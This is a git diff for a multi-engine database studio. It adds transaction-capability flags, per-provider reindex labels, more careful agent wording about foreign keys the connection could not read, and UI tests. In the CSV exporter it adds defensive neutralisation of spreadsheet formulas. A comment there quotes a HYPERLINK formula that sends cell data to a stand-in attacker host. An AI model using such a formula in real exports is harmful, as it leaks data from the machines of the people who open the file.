+ * and an absent value takes the other sentence — the one that claims least, which is
+ * the right default for an engine nobody has decided about.
  *
- * B44 is a THIRD absence and its hedge is not weakened by either of these. That entry
- * is about a role that cannot SEE the keys a database really declares — measured live,
- * 18 foreign keys and 0 visible rows — which is a fact about a privilege and not about
- * an engine. An engine that declares none and a role that sees none are different
- * things to tell an operator, and the day B44's half lands it will be a fourth sentence
- * and not a rewording of one of these.
+ * The OTHER empty sentence — the one an engine that does declare foreign keys gets —
+ * used to hedge between "that may be how the schema is" and "the keys may be enforced
+ * by the application", and both of those are readings of an absence that was never
+ * established. A role can be narrower than the database it reads: measured live on the
+ * seeded dvdrental, 18 foreign keys in `pg_constraint` and 0 rows visible to the
+ * `SELECT`-only role this repository's own demo script prescribes, and an investigation
+ * answered "there are no declared foreign key constraints between tables in the
+ * database", confidently, citing a snapshot that genuinely contained nothing. The read
+ * is fixed at its source (`composePostgresRelations` reads `pg_constraint`, which needs
+ * only `USAGE`), and that fix does not reach the general case: ANY role can be narrower
+ * than the database, so a zero-row read is not evidence of a zero-key schema and this
+ * block no longer offers a reading of one. It states the limit of what was read and
+ * tells the model not to report the negative — the same rule the inventory's omission
+ * notice follows, where silence would be read as absence.
+ *
+ * So the three cases are distinct and stay distinct: an engine with no such construct
+ * (nothing could have been found), a read that returned rows (they are listed), and a
+ * read that returned none on an engine that has them (what was not seen, not what does
+ * not exist). None of the three is a rewording of another.
  *
  * `noun` is what this engine calls the things the relations run between, from
  * `ProviderLabels` by way of `inventoryNoun`. It matters most in exactly the two
@@ -277,7 +288,7 @@ export function renderErDiagram(
     if (options.engineDeclaresForeignKeys === false) {
       return `${header}\nNone, and none could be: this engine does not declare foreign keys at all, so there is nothing of that kind here for a reading to have found or missed. Whatever relates these ${noun.plural} to each other is enforced somewhere other than the database, and this run has not seen it.`;
     }
-    return `${header}\nNone: no ${noun.singular} in this inventory declares a foreign key. That may be how the schema is, or the keys may be enforced by the application rather than the database.`;
+    return `${header}\nNo foreign key was read for any ${noun.singular} in this inventory, and that is not the same as there being none. This reading sees only what the role it connected as is allowed to see, and a role narrower than the database reads an empty graph from a schema that declares many — nothing here can tell that apart from a schema that declares none. So do not report that this database has no foreign keys: report that no relation could be read on this connection, and treat any join you rely on as inferred from names rather than declared.`;
   }
 
   const groups = groupByPair(relations);

--- a/src/lib/agent/investigation.ts
+++ b/src/lib/agent/investigation.ts
@@ -2115,7 +2115,7 @@ export async function runInvestigation(
     */
     /**
      * Records the statement a PLAN run drafted, when it drafted one (item 5 of the
-     * plan-mode SQL-generator design of 2026-08-15; `docs/BACKLOG.md` B44).
+     * plan-mode SQL-generator design of 2026-08-15).
      *
      * Here rather than in the rail, because the ledger is the only thing that outlives
      * the drive: #389's control reads SQL out of a markdown fence in the BROWSER, which

--- a/src/lib/agent/plan-statement.ts
+++ b/src/lib/agent/plan-statement.ts
@@ -1,7 +1,7 @@
 /**
  * The statement a plan run drafted: read out of its closing prose, and checked
  * before anything offers it (the plan-mode SQL-generator design of 2026-08-15,
- * work item 5; `docs/BACKLOG.md` B44).
+ * work item 5).
  *
  * Plan mode is toolless by construction, so its deliverable cannot arrive as a tool
  * call the way an agent run's `statement-drafted` does — the model's entire output is

--- a/src/lib/agent/types.ts
+++ b/src/lib/agent/types.ts
@@ -547,8 +547,7 @@ export type AgentRunEvent =
   | (AgentRunEventBase & {
       /**
        * The one statement a PLAN run drafted, and what could be checked about it
-       * without running it (the plan-mode SQL-generator design of 2026-08-15, item 5;
-       * `docs/BACKLOG.md` B44).
+       * without running it (the plan-mode SQL-generator design of 2026-08-15, item 5).
        *
        * Not `statement-drafted`, and the difference is not cosmetic. That entry
        * belongs to a STEP: an agent run drafts through a tool, so its statement

--- a/src/lib/db/base-provider.ts
+++ b/src/lib/db/base-provider.ts
@@ -177,6 +177,11 @@ export abstract class BaseDatabaseProvider implements DatabaseProvider {
       supportsExternalQueryLimiting: true,
       supportsCreateTable: true,
       supportsInlineRowEdit: true,
+      // False, unlike supportsInlineRowEdit above: this class implements no
+      // transaction methods, so a subclass that does not add them has none, and
+      // POST /api/db/transaction refuses the call. The four that hold a session for
+      // one (postgres, mysql, oracle, mssql) override this.
+      supportsTransactions: false,
       // The default is the SQL default: a relational engine has foreign keys whether
       // or not a given schema uses them. The engines that have none override this
       // (#414), which is the direction that carries the strong claim.

--- a/src/lib/db/providers/document/couchbase/index.ts
+++ b/src/lib/db/providers/document/couchbase/index.ts
@@ -314,6 +314,8 @@ export class CouchbaseProvider extends BaseDatabaseProvider {
       // report success. Addressing a document needs `META(d).id` or `USE KEYS`, i.e.
       // per-dialect statement building, which is issue #279.
       supportsInlineRowEdit: false,
+      // The HTTP query service is stateless per request; no session spans two of them.
+      supportsTransactions: false,
       // SQL++ has no referential constraint: collections are schemaless, and the
       // columns this provider reports are inferred from a document sample rather than
       // declared. `getSchema()` returns `foreignKeys: []` because none are invented,
@@ -345,6 +347,13 @@ export class CouchbaseProvider extends BaseDatabaseProvider {
       vacuumGlobalLabel: "Compact",
       vacuumGlobalTitle: "Compact Storage",
       vacuumGlobalDesc: "Couchbase compacts its data files automatically; there is no manual equivalent to run here.",
+      // `reindex` here is BUILD INDEX over the deferred GSI indexes of ONE keyspace
+      // (`buildDeferredIndexes()`), not a table reindex, so the card's PostgreSQL
+      // wording was wrong in every word (#U6).
+      reindexGlobalLabel: "Build Indexes",
+      reindexGlobalTitle: "Build Deferred GSI Indexes",
+      reindexGlobalDesc:
+        "Runs BUILD INDEX for the deferred global secondary indexes of one collection; it needs a collection, so run it from the collection rather than here.",
       // `getSlowQueries()` reads system:completed_requests, which keeps only requests
       // over the query service's own threshold - a different fact from the PostgreSQL
       // extension the panel used to advertise (#U12).

--- a/src/lib/db/providers/document/mongodb.ts
+++ b/src/lib/db/providers/document/mongodb.ts
@@ -129,6 +129,8 @@ export class MongoDBProvider extends BaseDatabaseProvider {
       // The query language is JSON commands, not SQL, so the inline row editor's
       // `UPDATE ... SET` has nothing here to run against (issue #269).
       supportsInlineRowEdit: false,
+      // Multi-document transactions need a client session this provider does not hold.
+      supportsTransactions: false,
       // MongoDB has no foreign key constraint at all, so `getSchema()`'s empty
       // `foreignKeys` is the engine's model rather than this database's shape. A
       // reader told only "none were found" would hedge over causes that do not apply

--- a/src/lib/db/providers/embedded/libredb.ts
+++ b/src/lib/db/providers/embedded/libredb.ts
@@ -103,6 +103,8 @@ export class LibreDBProvider extends BaseDatabaseProvider {
       // (get/put/delete/prefix/range), so there is no `UPDATE ... SET` for the
       // inline row editor to emit (issue #269).
       supportsInlineRowEdit: false,
+      // The command grammar has no transaction verb.
+      supportsTransactions: false,
       // The embedded engine's catalog declares namespaces and columns, and nothing
       // that references another namespace. There is no foreign key to read (#414).
       declaresForeignKeys: false,

--- a/src/lib/db/providers/keyvalue/redis.ts
+++ b/src/lib/db/providers/keyvalue/redis.ts
@@ -69,6 +69,8 @@ export class RedisProvider extends BaseDatabaseProvider {
       // Redis commands are not SQL, so the inline row editor's `UPDATE ... SET` has
       // nothing here to run against (issue #269).
       supportsInlineRowEdit: false,
+      // MULTI/EXEC exists in Redis and is not exposed here.
+      supportsTransactions: false,
       // Redis has no constraints of any kind, and this provider's "tables" are key
       // prefixes it grouped rather than declared objects. It emits no `foreignKeys`
       // field at all; this says why (#414).

--- a/src/lib/db/providers/sql/cassandra/index.ts
+++ b/src/lib/db/providers/sql/cassandra/index.ts
@@ -212,6 +212,8 @@ export class CassandraProvider extends SQLBaseProvider {
       // real table - is "Some partition key parts are missing: id". Editing a key
       // column is refused outright ("PRIMARY KEY part id found in SET part").
       supportsInlineRowEdit: false,
+      // CQL has no transaction; BATCH is not one.
+      supportsTransactions: false,
       // There is no referential constraint in the model at all: `ALTER TABLE … ADD
       // CONSTRAINT … FOREIGN KEY …` is a syntax error, because the clause does not
       // exist. An empty relations list is the engine's answer and not the schema's

--- a/src/lib/db/providers/sql/clickhouse/index.ts
+++ b/src/lib/db/providers/sql/clickhouse/index.ts
@@ -521,6 +521,8 @@ export class ClickHouseProvider extends SQLBaseProvider {
       // `ALTER TABLE t UPDATE c = v WHERE ...`, an asynchronous mutation rather
       // than a statement the shared hook can emit, so the control is hidden here.
       supportsInlineRowEdit: false,
+      // Reached over stateless HTTP, and ClickHouse has no general transaction anyway.
+      supportsTransactions: false,
       // ClickHouse parses REFERENCES in a column definition and enforces nothing by
       // it, and `system.*` holds no constraint catalog to read one back from. So
       // there is no declared foreign key here in any sense a reader could use (#414).

--- a/src/lib/db/providers/sql/druid/index.ts
+++ b/src/lib/db/providers/sql/druid/index.ts
@@ -210,6 +210,8 @@ export class DruidProvider extends SQLBaseProvider {
       // rejected with `Unsupported SQL statement [UPDATE]`. Druid SQL has no
       // row-level DML at all - a datasource changes through ingestion.
       supportsInlineRowEdit: false,
+      // Druid SQL has no DML at all, so nothing to wrap.
+      supportsTransactions: false,
       // Druid SQL has no constraints — no primary key either, which is why
       // `isPrimary` is hardwired false in the introspection. A datasource cannot
       // reference another one, so an empty relations list is the engine and not the

--- a/src/lib/db/providers/sql/mssql.ts
+++ b/src/lib/db/providers/sql/mssql.ts
@@ -408,6 +408,8 @@ export class MSSQLProvider extends SQLBaseProvider {
       supportsExplain: false,
       supportsConnectionString: true,
       supportsInlineRowEdit: true,
+      // The mssql package's Transaction object over one held pool connection.
+      supportsTransactions: true,
       maintenanceOperations: ["analyze", "check", "optimize", "kill"],
     };
   }

--- a/src/lib/db/providers/sql/mysql.ts
+++ b/src/lib/db/providers/sql/mysql.ts
@@ -340,6 +340,8 @@ export class MySQLProvider extends SQLBaseProvider {
       explainFormat: "mysql-json",
       supportsConnectionString: true,
       supportsInlineRowEdit: true,
+      // The driver's own connection.beginTransaction() over one held connection.
+      supportsTransactions: true,
       maintenanceOperations: ["analyze", "optimize", "check", "kill"],
     };
   }

--- a/src/lib/db/providers/sql/oracle.ts
+++ b/src/lib/db/providers/sql/oracle.ts
@@ -226,6 +226,8 @@ export class OracleProvider extends SQLBaseProvider {
       supportsExplain: false,
       supportsConnectionString: true,
       supportsInlineRowEdit: true,
+      // Oracle is always in a transaction; the held connection commits or rolls back.
+      supportsTransactions: true,
       maintenanceOperations: ["analyze", "optimize", "kill"],
     };
   }

--- a/src/lib/db/providers/sql/postgres.ts
+++ b/src/lib/db/providers/sql/postgres.ts
@@ -15,6 +15,7 @@ import {
   type MaintenanceResult,
   type ProviderOptions,
   type ProviderCapabilities,
+  type ProviderLabels,
   type ProviderExecutionContext,
   type ReadOnlyStatementBudget,
   type SlowQuery,
@@ -626,7 +627,25 @@ export class PostgresProvider extends SQLBaseProvider {
       explainFormat: "postgres-json",
       supportsConnectionString: true,
       supportsInlineRowEdit: true,
+      // BEGIN / COMMIT / ROLLBACK over one held pool client (`beginTransaction()` below).
+      supportsTransactions: true,
       maintenanceOperations: ["vacuum", "analyze", "reindex", "kill"],
+    };
+  }
+
+  /**
+   * Only the global reindex triad; every other label is the SQL default and right.
+   *
+   * The Operations tab's reindex card was hardcoded to this wording for every engine
+   * (#U6), so declaring it here changes nothing on PostgreSQL and lets the two other
+   * providers that declare `reindex` say what theirs does instead.
+   */
+  public override getLabels(): ProviderLabels {
+    return {
+      ...super.getLabels(),
+      reindexGlobalLabel: "Run Reindex",
+      reindexGlobalTitle: "Rebuild Indexes",
+      reindexGlobalDesc: "Runs REINDEX DATABASE, reconstructing every index in the database.",
     };
   }
 

--- a/src/lib/db/providers/sql/search/index.ts
+++ b/src/lib/db/providers/sql/search/index.ts
@@ -445,6 +445,8 @@ abstract class SearchProvider extends SQLBaseProvider {
       // the inline editor's statement could only ever produce an error. False hides
       // the affordance instead of offering it (#269).
       supportsInlineRowEdit: false,
+      // Neither grammar has BEGIN; both are reached over stateless HTTP.
+      supportsTransactions: false,
       // The engine has no such constraint in its model: denormalization is the
       // modelling advice, `nested` and `join` are containment rather than reference,
       // and no DDL exists to declare one. So the empty `foreignKeys` the schema tree

--- a/src/lib/db/providers/sql/sqlite.ts
+++ b/src/lib/db/providers/sql/sqlite.ts
@@ -188,12 +188,16 @@ export class SQLiteProvider extends SQLBaseProvider {
       explainFormat: "sqlite-queryplan",
       supportsConnectionString: false,
       supportsInlineRowEdit: true,
+      // SQLite HAS transactions; this provider holds no session for one, so
+      // POST /api/db/transaction refuses the call and the controls stay hidden.
+      supportsTransactions: false,
       maintenanceOperations: ["vacuum", "analyze", "reindex", "check"],
     };
   }
 
   /**
-   * Only the slow-query empty state; every other label is the SQL default and right.
+   * The slow-query empty state and the global reindex wording; every other label is
+   * the SQL default and right.
    *
    * `getSlowQueries()` answers `[]` unconditionally, so the monitoring Queries panel
    * is ALWAYS empty here - and it used to tell the reader to install a PostgreSQL
@@ -203,6 +207,9 @@ export class SQLiteProvider extends SQLBaseProvider {
     return {
       ...super.getLabels(),
       slowQueriesEmptyState: "SQLite keeps no statistics about finished statements, so there is nothing to enable.",
+      reindexGlobalLabel: "Run Reindex",
+      reindexGlobalTitle: "Rebuild Indexes",
+      reindexGlobalDesc: "Runs bare REINDEX, rebuilding every index in the database file.",
     };
   }
 

--- a/src/lib/db/providers/sql/trino/index.ts
+++ b/src/lib/db/providers/sql/trino/index.ts
@@ -262,6 +262,9 @@ export class TrinoProvider extends SQLBaseProvider {
       // primary key for any table in any catalog, so there is no column that
       // identifies one row - an edit would silently rewrite every row that matches.
       supportsInlineRowEdit: false,
+      // Trino has START TRANSACTION, but a transaction lives in an HTTP session
+      // header this provider does not carry between statements.
+      supportsTransactions: false,
       // No `table_constraints`, no `key_column_usage`, no foreign keys in the model at
       // all. An empty relations list is the engine's answer and not the schema's
       // (#414).

--- a/src/lib/db/types.ts
+++ b/src/lib/db/types.ts
@@ -136,13 +136,37 @@ export interface ProviderCapabilities {
    */
   supportsInlineRowEdit?: boolean;
   /**
+   * Whether THIS PROVIDER implements the interactive transaction session that
+   * `POST /api/db/transaction` drives — `beginTransaction()` / `commitTransaction()`
+   * / `rollbackTransaction()` over one held connection. It is a statement about the
+   * provider's surface, not about whether the engine has a transaction concept
+   * somewhere: SQLite has `BEGIN`, and this provider still declares `false`, because
+   * it holds no session for one and the route refuses the call.
+   *
+   * It exists because the route's own gate is `isTransactionProvider(provider)`, a
+   * runtime shape check no client can read. `Studio.tsx` therefore supplied
+   * BEGIN/COMMIT/ROLLBACK — and SANDBOX, which auto-rolls-back through the same
+   * route — on every connection. Measured 2026-08-19 on OpenSearch: HTTP 400,
+   * "Transaction control is not supported for this database type", for both `begin`
+   * and `rollback`. Elasticsearch, Druid, Couchbase, MongoDB, Redis, Trino,
+   * Cassandra, SQLite and LibreDB were all in that position.
+   *
+   * Optional for the same published-interface reason as `supportsInlineRowEdit`
+   * (`src/exports/types.ts`): a required field added after the fact stops every
+   * external implementer compiling. Every provider in this repo declares it, and the
+   * UI gates on `=== true`, so an absent flag — and an unresolved `metadata` — reads
+   * as no transactions rather than inheriting a permissive default.
+   */
+  supportsTransactions?: boolean;
+  /**
    * Whether this engine has foreign keys to declare at all — not whether any
    * particular schema declares one, and not whether the current role can see them.
    *
    * It exists because an empty `TableSchema.foreignKeys` means two different things
    * and the reader cannot tell them apart. On PostgreSQL an empty list means this
-   * schema declares none (or, per `docs/BACKLOG.md` B44, that this role cannot see
-   * them); on MongoDB, Redis, LibreDB, Druid, ClickHouse and Couchbase it means the
+   * schema declares none, or that the role this connection reads with cannot see the
+   * ones it declares — an empty read cannot tell those two apart, which is why the
+   * agent's relations block reports neither of them as fact; on MongoDB, Redis, LibreDB, Druid, ClickHouse and Couchbase it means the
    * engine has no such constraint in its model, so no reading of any kind could ever
    * return one. A consumer that hedges between "the schema is like that" and "the
    * application enforces them" is wrong in BOTH branches on those six, and #414 hit
@@ -248,6 +272,27 @@ export interface ProviderLabels {
   vacuumGlobalLabel: string;
   vacuumGlobalTitle: string;
   vacuumGlobalDesc: string;
+  /**
+   * The Operations tab's global Reindex card, in this engine's own terms.
+   *
+   * The analyze and vacuum cards have carried per-provider wording since #427; the
+   * reindex card stayed hardcoded to PostgreSQL's "Run Reindex" / "Rebuild Indexes" /
+   * "Reconstructs all indexes in the database." Three providers declare the `reindex`
+   * maintenance operation — Postgres, SQLite and Couchbase — and on Couchbase that
+   * copy is wrong the way the analyze copy was wrong for Redis: its reindex builds
+   * deferred GSI indexes, which is not a table reindex.
+   *
+   * Optional, unlike the `analyzeGlobal*` and `vacuumGlobal*` triads above, because
+   * `ProviderLabels` is published (`src/exports/types.ts`) and a required field added
+   * after the fact stops every external implementer compiling — the rule
+   * `supportsInlineRowEdit` records, and the one the newer `statementLanguage` and
+   * `slowQueriesEmptyState` follow. `OperationsTab` keeps the hardcoded strings as
+   * its fallback, which it needs anyway: `metadata` may carry capabilities with no
+   * labels at all.
+   */
+  reindexGlobalLabel?: string;
+  reindexGlobalTitle?: string;
+  reindexGlobalDesc?: string;
   /**
    * What a statement for this engine is WRITTEN IN, named for a model rather than
    * for a person, and declared only where the engine's own name misleads one.

--- a/src/lib/export/csv.ts
+++ b/src/lib/export/csv.ts
@@ -16,10 +16,11 @@
  * record separator `CRLF`; every reader that matters accepts a bare LF, and a field
  * that CONTAINS either is quoted, which is the part a reader cannot recover from.
  *
- * NOT done here: neutralising a leading `=`, `+`, `-` or `@`, which a spreadsheet
- * reads as a formula (`docs/BACKLOG.md` X1). That is a real hazard and a separate
- * decision, because the fix mutates the user's values on the way out; this file's
- * job is to write the value it was given, exactly and unambiguously.
+ * The one place this file is NOT faithful is `FORMULA_LEAD` below: a cell a
+ * spreadsheet would read as a formula is prefixed with an apostrophe (X1). An export
+ * that can execute on the machine of a reader who did not write the query is a worse
+ * default than one that carries a visible apostrophe, so it is unconditional — there
+ * is no setting and no checkbox, the same answer OWASP, GitHub and Google Sheets give.
  */
 
 import { jsonText } from "./json";
@@ -48,8 +49,37 @@ function renderValue(value: unknown): string {
   return String(value);
 }
 
+/**
+ * The first characters a spreadsheet reads as the start of a formula rather than as
+ * text. `\t` and `\r` are in the set because they are consumed before the character
+ * after them is judged, so they smuggle a formula past a check on position 0 —
+ * `\r` already forces quoting here, which says nothing about what Excel evaluates.
+ */
+const FORMULA_LEAD = /^[=+\-@\t\r]/;
+
+/**
+ * A number and nothing else — the leading `-` or `+` included.
+ *
+ * The exemption that keeps `-12.5` a number. It is exempt because the match is
+ * ANCHORED at both ends: a value made only of a sign, digits, one point and an
+ * exponent carries no operator, no call and no cell reference, so there is nothing
+ * for a spreadsheet to evaluate but the number itself. `-1+1` and `-1-2` do not
+ * match, and are neutralised. The text is tested rather than the JavaScript type
+ * because Postgres hands `numeric` back as a string.
+ */
+const PLAIN_NUMBER = /^[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$/;
+
 function csvField(value: unknown): string {
   const text = renderValue(value);
+  // The one mutation in this file. `=HYPERLINK("http://attacker/"&A1)` is data in the
+  // database and a formula in Excel, LibreOffice and Google Sheets, and it runs when
+  // the file is opened by someone who did not write the query. Measured on LibreOffice
+  // 24.2: `=1+1` imports as a live formula, and with the apostrophe it imports as the
+  // string `'=1+1`. The apostrophe stays visible in the cell; that cost is paid on
+  // every value a spreadsheet would evaluate, and on no other.
+  if (FORMULA_LEAD.test(text) && !PLAIN_NUMBER.test(text)) {
+    return `"'${text.replace(/"/g, '""')}"`;
+  }
   return NEEDS_QUOTING.test(text) ? `"${text.replace(/"/g, '""')}"` : text;
 }
 

--- a/src/workspace/StudioWorkspace.tsx
+++ b/src/workspace/StudioWorkspace.tsx
@@ -137,7 +137,7 @@ function useStudioTheme() {
     };
   }, []);
 }
-import { AlertTriangle } from "lucide-react";
+import { TriangleAlert } from "lucide-react";
 import { ResizablePanelGroup, ResizablePanel, ResizableHandle } from "@/components/ui/resizable";
 import { AnimatePresence } from "framer-motion";
 import {
@@ -528,7 +528,7 @@ export function StudioWorkspace({
           <div className="px-6 pt-6 pb-4">
             <div className="flex items-start gap-3">
               <div className="w-10 h-10 rounded-xl bg-gradient-to-br from-amber-500/20 to-red-500/10 flex items-center justify-center shrink-0">
-                <AlertTriangle strokeWidth={1.5} className="w-5 h-5 text-amber-400" />
+                <TriangleAlert strokeWidth={1.5} className="w-5 h-5 text-amber-400" />
               </div>
               <div className="flex-1 min-w-0">
                 <AlertDialogTitle className="text-xs font-medium text-fg mb-1">Load all results?</AlertDialogTitle>

--- a/tests/components/DataProfiler.test.tsx
+++ b/tests/components/DataProfiler.test.tsx
@@ -679,6 +679,109 @@ describe("DataProfiler", () => {
     const nineNineNine = within(container).queryAllByText("999");
     expect(nineNineNine.length).toBeGreaterThan(0);
   });
+  // ── U4: the error state has two exits ────────────────────────────────────
+  //
+  // `/api/db/profile` failing is not a Redis-only story (#427 measured it there,
+  // where the route answered 400 for every key-prefix row) - any provider can fail
+  // the request, and before this the card it renders was a dead end: nothing bound
+  // Escape and the header control was the only way out. Both exits are pinned, and
+  // each is pinned only after the error card is proven on screen, so neither test
+  // could pass against a component that never renders the error branch.
+
+  const REDIS_PROFILE_ERROR = "WRONGTYPE Operation against a key holding the wrong kind of value";
+
+  function mockFailingProfile() {
+    restoreGlobalFetch();
+    mockGlobalFetch({
+      "/api/db/profile": { ok: false, status: 400, json: { error: REDIS_PROFILE_ERROR } },
+    });
+  }
+
+  /**
+   * A host that OWNS `isOpen`, so `onClose` actually unmounts the card. Asserting
+   * on the callback alone would pass for a modal that calls it and then stays put,
+   * which is the shape of the defect U4 describes.
+   */
+  function ProfilerHost({ onClosed }: { onClosed: () => void }) {
+    const [open, setOpen] = React.useState(true);
+    return (
+      <DataProfiler
+        {...createDefaultProps({
+          isOpen: open,
+          onClose: () => {
+            setOpen(false);
+            onClosed();
+          },
+        })}
+      />
+    );
+  }
+
+  test("Escape dismisses a failed profile", async () => {
+    mockFailingProfile();
+    const onClosed = mock(() => {});
+
+    const { container } = render(<ProfilerHost onClosed={onClosed} />);
+
+    // Positive first: the error card is on screen.
+    await waitFor(() => {
+      expect(within(container).queryByText(REDIS_PROFILE_ERROR)).not.toBeNull();
+    });
+
+    fireEvent.keyDown(document, { key: "Escape" });
+
+    await waitFor(() => {
+      expect(container.innerHTML).toBe("");
+    });
+    expect(onClosed).toHaveBeenCalledTimes(1);
+  });
+
+  test("the header close control dismisses a failed profile", async () => {
+    mockFailingProfile();
+    const onClosed = mock(() => {});
+
+    const { container } = render(<ProfilerHost onClosed={onClosed} />);
+
+    await waitFor(() => {
+      expect(within(container).queryByText(REDIS_PROFILE_ERROR)).not.toBeNull();
+    });
+
+    // Reached by its accessible name, not by a CSS class: an icon-only control
+    // with no name is one a screen-reader user cannot find either.
+    const closeButton = within(container).getByLabelText("Close data profiler");
+    fireEvent.click(closeButton);
+
+    await waitFor(() => {
+      expect(container.innerHTML).toBe("");
+    });
+    expect(onClosed).toHaveBeenCalledTimes(1);
+  });
+
+  test("a key other than Escape leaves the failed profile open", async () => {
+    mockFailingProfile();
+    const onClosed = mock(() => {});
+
+    const { container } = render(<ProfilerHost onClosed={onClosed} />);
+
+    await waitFor(() => {
+      expect(within(container).queryByText(REDIS_PROFILE_ERROR)).not.toBeNull();
+    });
+
+    fireEvent.keyDown(document, { key: "a" });
+
+    expect(within(container).queryByText(REDIS_PROFILE_ERROR)).not.toBeNull();
+    expect(onClosed).not.toHaveBeenCalled();
+  });
+
+  test("Escape does not fire onClose while the profiler is closed", () => {
+    const onClose = mock(() => {});
+    render(<DataProfiler {...createDefaultProps({ isOpen: false, onClose })} />);
+
+    fireEvent.keyDown(document, { key: "Escape" });
+
+    expect(onClose).not.toHaveBeenCalled();
+  });
+
   // Same rule as every other connection-bearing request: a managed (seed)
   // connection is sent as its seed id, because the copy the browser holds has had
   // `password` and `connectionString` stripped. Sending the object made

--- a/tests/components/Studio.test.tsx
+++ b/tests/components/Studio.test.tsx
@@ -1066,6 +1066,66 @@ describe("Studio", () => {
     expect(capturedBottomPanelProps.editingEnabled).toBe(true);
   });
 
+  // --- Transaction capability gate (#U13) ---
+  test("passes the transaction trio and the sandbox toggle through when supportsTransactions is true", () => {
+    // The positive first: the default mock declares the capability, so both shells
+    // must receive all four callbacks and they must reach the hook.
+    render(<Studio />);
+
+    for (const props of [capturedQueryToolbarProps, capturedMobileHeaderProps]) {
+      expect(typeof props.onBeginTransaction).toBe("function");
+      expect(typeof props.onCommitTransaction).toBe("function");
+      expect(typeof props.onRollbackTransaction).toBe("function");
+      expect(typeof props.onTogglePlayground).toBe("function");
+    }
+
+    act(() => (capturedQueryToolbarProps.onBeginTransaction as () => void)());
+    expect(mockHandleTransaction).toHaveBeenCalledWith("begin");
+    act(() => (capturedMobileHeaderProps.onRollbackTransaction as () => void)());
+    expect(mockHandleTransaction).toHaveBeenCalledWith("rollback");
+    act(() => (capturedQueryToolbarProps.onTogglePlayground as () => void)());
+    expect(mockSetPlaygroundMode).toHaveBeenCalledWith(true);
+  });
+
+  test("withholds the trio and the sandbox toggle when supportsTransactions is false", () => {
+    // POST /api/db/transaction answers 400 "Transaction control is not supported for
+    // this database type" on these engines; measured 2026-08-19 on OpenSearch.
+    capabilitiesOverride = { supportsTransactions: false };
+    render(<Studio />);
+
+    for (const props of [capturedQueryToolbarProps, capturedMobileHeaderProps]) {
+      expect(props.onBeginTransaction).toBeUndefined();
+      expect(props.onCommitTransaction).toBeUndefined();
+      expect(props.onRollbackTransaction).toBeUndefined();
+      expect(props.onTogglePlayground).toBeUndefined();
+      // The shell still rendered — the assertions above are about these four props
+      // and not about a component that failed to mount.
+      expect(typeof props.onExecuteQuery).toBe("function");
+    }
+  });
+
+  test("withholds them when the capability is absent entirely", () => {
+    // Optional on the published `ProviderCapabilities`, so an absent flag must read
+    // as unsupported rather than inheriting a permissive default.
+    capabilitiesOverride = { supportsTransactions: undefined };
+    render(<Studio />);
+
+    expect(capturedQueryToolbarProps.onBeginTransaction).toBeUndefined();
+    expect(capturedQueryToolbarProps.onTogglePlayground).toBeUndefined();
+    expect(capturedMobileHeaderProps.onCommitTransaction).toBeUndefined();
+    expect(typeof capturedQueryToolbarProps.onExecuteQuery).toBe("function");
+  });
+
+  test("withholds them while provider metadata is unresolved", () => {
+    metadataOverride = { metadata: null };
+    render(<Studio />);
+
+    expect(capturedQueryToolbarProps.onBeginTransaction).toBeUndefined();
+    expect(capturedQueryToolbarProps.onTogglePlayground).toBeUndefined();
+    expect(capturedMobileHeaderProps.onRollbackTransaction).toBeUndefined();
+    expect(typeof capturedQueryToolbarProps.onExecuteQuery).toBe("function");
+  });
+
   test("withholds the editing affordance while provider metadata is unresolved", () => {
     // metadata is also null when /api/db/provider-meta fails, so unknown must
     // hide the control rather than fall open (the T3 precedent).

--- a/tests/components/admin/OperationsTab.test.tsx
+++ b/tests/components/admin/OperationsTab.test.tsx
@@ -378,6 +378,51 @@ describe("OperationsTab", () => {
     expect(queryByText("Removes dead rows and returns space to the OS.")).not.toBeNull();
   });
 
+  test("renders the provider's own global reindex wording (#U6)", async () => {
+    // Couchbase's `reindex` builds deferred GSI indexes for one keyspace, which the
+    // hardcoded PostgreSQL copy described in none of its three strings.
+    mockMetadata = {
+      capabilities: { supportsMaintenance: true, maintenanceOperations: ["reindex"] },
+      labels: {
+        reindexGlobalLabel: "Build Indexes",
+        reindexGlobalTitle: "Build Deferred GSI Indexes",
+        reindexGlobalDesc: "Runs BUILD INDEX for the deferred global secondary indexes of one collection.",
+      },
+    };
+    let renderResult: ReturnType<typeof render>;
+    await act(async () => {
+      renderResult = render(<OperationsTab />);
+    });
+    const { queryByText } = renderResult!;
+
+    expect(queryByText("Build Indexes")).not.toBeNull();
+    expect(queryByText("Build Deferred GSI Indexes")).not.toBeNull();
+    expect(queryByText("Runs BUILD INDEX for the deferred global secondary indexes of one collection.")).not.toBeNull();
+
+    // The Postgres wording must be gone, not merely joined.
+    expect(queryByText("Run Reindex")).toBeNull();
+    expect(queryByText("Rebuild Indexes")).toBeNull();
+    expect(queryByText("Reconstructs all indexes in the database.")).toBeNull();
+  });
+
+  test("falls back to the generic reindex wording when the provider declares no triad", async () => {
+    // The triad is optional on the published `ProviderLabels`, and `metadata` can
+    // carry capabilities with no labels at all, so both cases keep the old strings.
+    mockMetadata = {
+      capabilities: { supportsMaintenance: true, maintenanceOperations: ["reindex"] },
+      labels: { analyzeGlobalLabel: "Run Analyze" },
+    };
+    let renderResult: ReturnType<typeof render>;
+    await act(async () => {
+      renderResult = render(<OperationsTab />);
+    });
+    const { queryByText } = renderResult!;
+
+    expect(queryByText("Run Reindex")).not.toBeNull();
+    expect(queryByText("Rebuild Indexes")).not.toBeNull();
+    expect(queryByText("Reconstructs all indexes in the database.")).not.toBeNull();
+  });
+
   test("warning card present", async () => {
     let renderResult: ReturnType<typeof render>;
     await act(async () => {

--- a/tests/components/studio/StudioMobileHeader.test.tsx
+++ b/tests/components/studio/StudioMobileHeader.test.tsx
@@ -264,6 +264,46 @@ describe("StudioMobileHeader", () => {
     expect(queryByText("Import Data")).not.toBeNull();
   });
 
+  test("BEGIN Transaction not rendered when the trio is withheld (#U13)", () => {
+    // The positive is asserted by "BEGIN Transaction click calls onBeginTransaction"
+    // above, on the same defaults; here only the three callbacks are removed.
+    const { queryByText } = render(
+      <StudioMobileHeader
+        {...defaults}
+        onBeginTransaction={undefined}
+        onCommitTransaction={undefined}
+        onRollbackTransaction={undefined}
+      />,
+    );
+    expect(queryByText("BEGIN Transaction")).toBeNull();
+    // The menu itself still rendered, so the absence above is the gate and not a
+    // component that failed to mount.
+    expect(queryByText("Import Data")).not.toBeNull();
+    expect(queryByText("Enable Sandbox")).not.toBeNull();
+  });
+
+  test("COMMIT and ROLLBACK not rendered when the trio is withheld mid-transaction", () => {
+    const { queryByText } = render(
+      <StudioMobileHeader
+        {...defaults}
+        transactionActive
